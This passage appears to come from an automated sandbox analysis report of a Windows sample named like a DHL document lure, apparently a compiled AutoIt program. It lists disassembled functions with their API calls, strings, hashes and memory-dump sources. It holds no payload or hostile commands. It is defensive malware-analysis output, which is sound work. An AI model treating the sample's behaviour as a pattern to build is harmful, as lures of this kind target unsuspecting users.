API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: bb2fa788b0ce7be5f1f5059ee9aa3f1dac5bf276d7134764803970e3b85f19e2
Instruction ID: f64d4ef6c2d671f1ca54230fd770b579a2d092135a22c753732f1fff025d68e0
Opcode Fuzzy Hash: bb2fa788b0ce7be5f1f5059ee9aa3f1dac5bf276d7134764803970e3b85f19e2
Instruction Fuzzy Hash: AB918B35605201EFD324DF25C488F5ABBE0AF44318F14C9AAE4699B7A2C738EC45CF95

Function 00478CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00478CF3

Part of subcall function 00458E54: _wcslen.LIBCMT ref: 00458E77

_wcslen.LIBCMT ref: 00478D4E
_wcslen.LIBCMT ref: 00478D9C
_wcslen.LIBCMT ref: 00478DDC
_wcslen.LIBCMT ref: 00478E6E

Strings

winapi, xrefs: 00478D96, 00478D9B
none, xrefs: 00478E65, 00478E6A
stdcall, xrefs: 00478DD6, 00478DDB
cdecl, xrefs: 00478D48, 00478D4D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 09ef7fd9b15894f425f5316bc7593acb9816625f8b7bf247cd581d475caccc44
Instruction ID: 75cd0e73bd09a142bb394b5f6524e200b45c811073d8b225ded93bb323b281a5
Opcode Fuzzy Hash: 09ef7fd9b15894f425f5316bc7593acb9816625f8b7bf247cd581d475caccc44
Instruction Fuzzy Hash: D351A331A405169BCB24DF68C9449FEB7A5BF64324B20822FE52AE73C4DB38DD41C794

Function 0047372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00473774
CoUninitialize.OLE32 ref: 0047377F
CoCreateInstance.OLE32(?,00000000,00000017,0048FB78,?), ref: 004737D9
IIDFromString.OLE32(?,?), ref: 0047384C
VariantInit.OLEAUT32(?), ref: 004738E4
VariantClear.OLEAUT32(?), ref: 00473936

Strings

Invalid parameter, xrefs: 00473865
Failed to create object, xrefs: 004737E4, 0047389A
NULL Pointer assignment, xrefs: 0047381E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 58cace8ac5e1e94baf4ffaf25cb7943fe3ab0c320c26c7fa314d62f2ee556fbd
Instruction ID: 5f2d20d677643dccc01dffd8ed0ed1df1d2c7cc31a92e8f63aaa55bd461a7017
Opcode Fuzzy Hash: 58cace8ac5e1e94baf4ffaf25cb7943fe3ab0c320c26c7fa314d62f2ee556fbd
Instruction Fuzzy Hash: 9661B2706083019FD310EF54C884FAAB7E4AF45706F10885EF5899B291C778EE49DB9B

Function 00488B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00409BB2

Part of subcall function 0040912D: GetCursorPos.USER32(?), ref: 00409141
Part of subcall function 0040912D: ScreenToClient.USER32(00000000,?), ref: 0040915E
Part of subcall function 0040912D: GetAsyncKeyState.USER32(00000001), ref: 00409183
Part of subcall function 0040912D: GetAsyncKeyState.USER32(00000002), ref: 0040919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00488B6B
ImageList_EndDrag.COMCTL32 ref: 00488B71
ReleaseCapture.USER32 ref: 00488B77
SetWindowTextW.USER32(?,00000000), ref: 00488C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00488C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00488CFF

Strings

@GUI_DRAGFILE, xrefs: 00488C9A
p#L, xrefs: 00488C71
@GUI_DROPID, xrefs: 00488C51

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#L
API String ID: 1924731296-65872278
Opcode ID: 9beebc1c349faf50de1b1e04945addb2c9b7142f5c7ed0b8cfa64deb77b09119
Instruction ID: 2f09b46a4bae2785e0ef3c732fb886649b9aa738fc835eae7e011a831a6912a9
Opcode Fuzzy Hash: 9beebc1c349faf50de1b1e04945addb2c9b7142f5c7ed0b8cfa64deb77b09119
Instruction Fuzzy Hash: DF517B70504204AFD700EF25DC95FAE77E4FB88754F400A2EF9566B2E2DB749904CB6A

Function 00463388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004633CF

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004633F0

Strings

Error: , xrefs: 004634D1
"%s" (%d) : ==> %s:%s%s, xrefs: 00463504
^ ERROR , xrefs: 0046349E
Line %d (File "%s"):, xrefs: 00463443, 0046345C
Incorrect parameters to object property !, xrefs: 004634AB
"%s" (%d) : ==> %s:, xrefs: 00463522

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 05054d88a345782f2240b282aaa8b3adcb1068c8d425743d74a19d07fa38995b
Instruction ID: 95ea1e9117fc4f38a5f834719469869b483dc7579d50c630a84982d0b3697d8b
Opcode Fuzzy Hash: 05054d88a345782f2240b282aaa8b3adcb1068c8d425743d74a19d07fa38995b
Instruction Fuzzy Hash: 1F51AD71900259BADF16EBA0CD42EFEB378AF04345F204066F505761A2EB392F58CB69

Function 0045B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0045B5FC
_wcslen.LIBCMT ref: 0045B608
_wcslen.LIBCMT ref: 0045B64D
_wcslen.LIBCMT ref: 0045B68C
_wcslen.LIBCMT ref: 0045B6C7

Strings

EXISTS, xrefs: 0045B686, 0045B68B
APPEND, xrefs: 0045B6C1, 0045B6C6
REMOVE, xrefs: 0045B602, 0045B607
KEYS, xrefs: 0045B647, 0045B64C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 71f9ccbbabaf02fac191b382a772638057284d92238e479d5813efef7f832024
Instruction ID: bc3a8696c577d864c1dd772c32393e7e850f1a8e802c1afc1cc9c98f1848c76c
Opcode Fuzzy Hash: 71f9ccbbabaf02fac191b382a772638057284d92238e479d5813efef7f832024
Instruction Fuzzy Hash: 79411532A000269ACB106F7D88905BF77A1EFA0755B24412BEC21DB386E739CC85C7D5

Function 00465393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004653A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00465416
GetLastError.KERNEL32 ref: 00465420
SetErrorMode.KERNEL32(00000000,READY), ref: 004654A7

Strings

NOTREADY, xrefs: 0046544B
READONLY, xrefs: 00465452
READY, xrefs: 00465460, 00465468
INVALID, xrefs: 00465459
UNKNOWN, xrefs: 00465444

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 0fa2dbc450afb02ff0b83afb1e3622fb82d9314b568e34626715cd83f11c5eb3
Instruction ID: 46efd04a48ac9cee71bf95231e9e041e98423be88451ed673366f7ddc9d80b0c
Opcode Fuzzy Hash: 0fa2dbc450afb02ff0b83afb1e3622fb82d9314b568e34626715cd83f11c5eb3
Instruction Fuzzy Hash: 6D31A335A006049FC711DF68C484BAA7BB4EF45305F1484ABE505CF392EB79DD86CBA6

Function 00483C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00483C79
SetMenu.USER32(?,00000000), ref: 00483C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00483D10
IsMenu.USER32(?), ref: 00483D24
CreatePopupMenu.USER32 ref: 00483D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00483D5B
DrawMenuBar.USER32 ref: 00483D63

Strings

0, xrefs: 00483C54
F, xrefs: 00483D4E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 93b2ef4eb886156134c74200c467c13245f15e94f71088e3d04440399906161c
Instruction ID: 701700726a5e73681bb4a34ad9fa6c75977d20d783e24b6d982070f5b3702602
Opcode Fuzzy Hash: 93b2ef4eb886156134c74200c467c13245f15e94f71088e3d04440399906161c
Instruction Fuzzy Hash: 4D4179B5A01209AFDF14DF64D884EAE7BF5FF49341F14482EE90697360D734AA10CBA8

Function 00483A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00483A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00483AA0
GetWindowLongW.USER32(?,000000F0), ref: 00483AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00483AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00483B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00483BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00483BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00483BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00483BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00483C13

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 61e5f68a12592320eefe39e223f5a63033595b32d1dceaea7b6139f812cda1f8
Instruction ID: acd38336165f97eb10b0d3ccfafaecd7a3a69742e923af650a003457ecb2b94a
Opcode Fuzzy Hash: 61e5f68a12592320eefe39e223f5a63033595b32d1dceaea7b6139f812cda1f8
Instruction Fuzzy Hash: D6618EB5900248AFDB10EF64CC81EEE77B8EF09704F10046AFA15A73A2D774AE45DB54

Function 0045B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0045B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0045A1E1,?,00000001), ref: 0045B165
GetWindowThreadProcessId.USER32(00000000), ref: 0045B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0045A1E1,?,00000001), ref: 0045B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0045B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0045A1E1,?,00000001), ref: 0045B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0045A1E1,?,00000001), ref: 0045B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0045A1E1,?,00000001), ref: 0045B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0045A1E1,?,00000001), ref: 0045B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0045A1E1,?,00000001), ref: 0045B21D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 31c3cbedc4d90622b81189c819a9ff36a5e0ae8bc1c64d5d97b98cf04592cf49
Instruction ID: 62f5f9534366871ac0784898bb42fb7d2171c5c223e2ffd1be2894c7bada5e40
Opcode Fuzzy Hash: 31c3cbedc4d90622b81189c819a9ff36a5e0ae8bc1c64d5d97b98cf04592cf49
Instruction Fuzzy Hash: 4331A072540604AFDB509F65EC88FAE7BA9FB50357F10842AFD01D6291D7B899048FBC

Function 00422C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00422C94

Part of subcall function 004229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000), ref: 004229DE
Part of subcall function 004229C8: GetLastError.KERNEL32(00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000,00000000), ref: 004229F0

_free.LIBCMT ref: 00422CA0
_free.LIBCMT ref: 00422CAB
_free.LIBCMT ref: 00422CB6
_free.LIBCMT ref: 00422CC1
_free.LIBCMT ref: 00422CCC
_free.LIBCMT ref: 00422CD7
_free.LIBCMT ref: 00422CE2
_free.LIBCMT ref: 00422CED
_free.LIBCMT ref: 00422CFB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0708d2ef0f31e2891347ff9ca25b756c5e6ce101c75d6a761a75db5828fffc9c
Instruction ID: b42d3b70af5c7a602d15bdbfb6c6c32db1967305625165700ea54422be7e08b3
Opcode Fuzzy Hash: 0708d2ef0f31e2891347ff9ca25b756c5e6ce101c75d6a761a75db5828fffc9c
Instruction Fuzzy Hash: CB1199B5300118BFCB02EF55EA42CDD3B65FF09354FC144AAF9485B222D675EA909B54

Function 003F1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003F1459
OleUninitialize.OLE32(?,00000000), ref: 003F14F8
UnregisterHotKey.USER32(?), ref: 003F16DD
DestroyWindow.USER32(?), ref: 004324B9
FreeLibrary.KERNEL32(?), ref: 0043251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0043254B

Strings

close all, xrefs: 003F1454

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: d7f173cd72ce6057de82ee216be0a3ed22b9728917d5c84c9251d3e2b2ffafa0
Instruction ID: 16ff33e4e9a09f1f0ce1ab8438eadc33e3d1b044eb1d8ba664dd3ab6a409c838
Opcode Fuzzy Hash: d7f173cd72ce6057de82ee216be0a3ed22b9728917d5c84c9251d3e2b2ffafa0
Instruction Fuzzy Hash: B1D1CD31701212DFCB2AEF15D595B29F7A4BF09700F1041AEE94AAB261DB34ED12CF98

Function 003F5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 003F5C7A

Part of subcall function 003F5D0A: GetClientRect.USER32(?,?), ref: 003F5D30
Part of subcall function 003F5D0A: GetWindowRect.USER32(?,?), ref: 003F5D71
Part of subcall function 003F5D0A: ScreenToClient.USER32(?,?), ref: 003F5D99

GetDC.USER32 ref: 004346F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00434708
SelectObject.GDI32(00000000,00000000), ref: 00434716
SelectObject.GDI32(00000000,00000000), ref: 0043472B
ReleaseDC.USER32(?,00000000), ref: 00434733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004347C4

Strings

U, xrefs: 00434693

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 90a8f7363154f8be7ec97b803557a29d0bbff73892839cf4f09d45c84bd0239a
Instruction ID: d33696807b31993a450d545f2cd8c7b3c174638107d7b16ca1433722f0297f0c
Opcode Fuzzy Hash: 90a8f7363154f8be7ec97b803557a29d0bbff73892839cf4f09d45c84bd0239a
Instruction Fuzzy Hash: EE710435400209DFCF219F64C985AFA7BB5FF8A314F14126AEE525A2A6C338A841DF64

Function 0046359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004635E4

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

LoadStringW.USER32(004C2390,?,00000FFF,?), ref: 0046360A

Strings

Error: , xrefs: 004636EF
^ ERROR, xrefs: 004636C9
"%s" (%d) : ==> %s:%s%s, xrefs: 00463724
Line %d (File "%s"):, xrefs: 0046366B
"%s" (%d) : ==> %s:, xrefs: 00463742

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 481cd6634c55c1dda51242a821a7ef6f557dd5b2d298b4ba2b183dcdfb684ab8
Instruction ID: 9af0c90beb4d1bc8fc252cc1f4625a60772290acabbafe1c6e4bfb0f14c979b0
Opcode Fuzzy Hash: 481cd6634c55c1dda51242a821a7ef6f557dd5b2d298b4ba2b183dcdfb684ab8
Instruction Fuzzy Hash: 83518C7190024DBADF16EFA0CC42EEEBB78AF04345F144126F605761A2EB341A99DF69

Function 0046C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0046C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0046C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0046C2CA
GetLastError.KERNEL32 ref: 0046C322
SetEvent.KERNEL32(?), ref: 0046C336
InternetCloseHandle.WININET(00000000), ref: 0046C341

Strings

, xrefs: 0046C2BB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 388376ae60c827fc8b9c7ca6db6059fa806108f3edc909f9967ee361d3c13099
Instruction ID: 6d8a1149503b69150bc10fcfbc1d7ce4adafefc9567d9eaa33c397f341780048
Opcode Fuzzy Hash: 388376ae60c827fc8b9c7ca6db6059fa806108f3edc909f9967ee361d3c13099
Instruction Fuzzy Hash: 73316171500204AFD7219F6598C4A7B7AFCEB45744B10852EF88692340EB38DD459B7A

Function 0045989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00433AAF,?,?,Bad directive syntax error,0048CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004598BC
LoadStringW.USER32(00000000,?,00433AAF,?), ref: 004598C3

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00459987

Strings

Error: , xrefs: 00459955
., xrefs: 0045996D
%s (%d) : ==> %s.: %s %s, xrefs: 004598F1
Line %d (File "%s"):, xrefs: 0045992D
Line %d:, xrefs: 00459912

Memory Dump Source

